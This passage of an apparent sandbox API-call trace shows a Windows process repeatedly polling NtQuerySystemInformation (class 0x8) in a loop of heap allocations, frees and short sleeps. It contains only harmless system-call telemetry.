dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.037] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.038] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.038] Sleep (dwMilliseconds=0x110) [0195.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.045] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.050] Sleep (dwMilliseconds=0x110) [0195.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.068] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.069] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.069] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.070] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.070] Sleep (dwMilliseconds=0x110) [0195.075] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.075] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.076] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.080] Sleep (dwMilliseconds=0x110) [0195.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.101] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.101] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.102] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.102] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.103] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.103] Sleep (dwMilliseconds=0x110) [0195.106] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.106] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.115] Sleep (dwMilliseconds=0x110) [0195.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.128] Sleep (dwMilliseconds=0x110) [0195.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.145] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.146] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.146] Sleep (dwMilliseconds=0x110) [0195.257] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.257] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.257] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.258] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.258] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.258] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.267] Sleep (dwMilliseconds=0x110) [0195.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.287] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.287] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.287] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.288] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.289] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.290] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.290] Sleep (dwMilliseconds=0x110) [0195.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.304] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.305] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.305] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.306] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.306] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.306] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.307] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.307] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.307] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.308] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.308] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.309] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.309] Sleep (dwMilliseconds=0x110) [0195.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.364] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.365] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.366] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.366] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.367] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.367] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.367] Sleep (dwMilliseconds=0x110) [0195.383] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.383] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.383] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.384] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.384] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.385] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.385] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.385] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.386] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.386] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.386] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.387] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.390] Sleep (dwMilliseconds=0x110) [0195.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.411] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.412] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.412] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.413] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.413] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.414] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.414] Sleep (dwMilliseconds=0x110) [0195.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.430] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 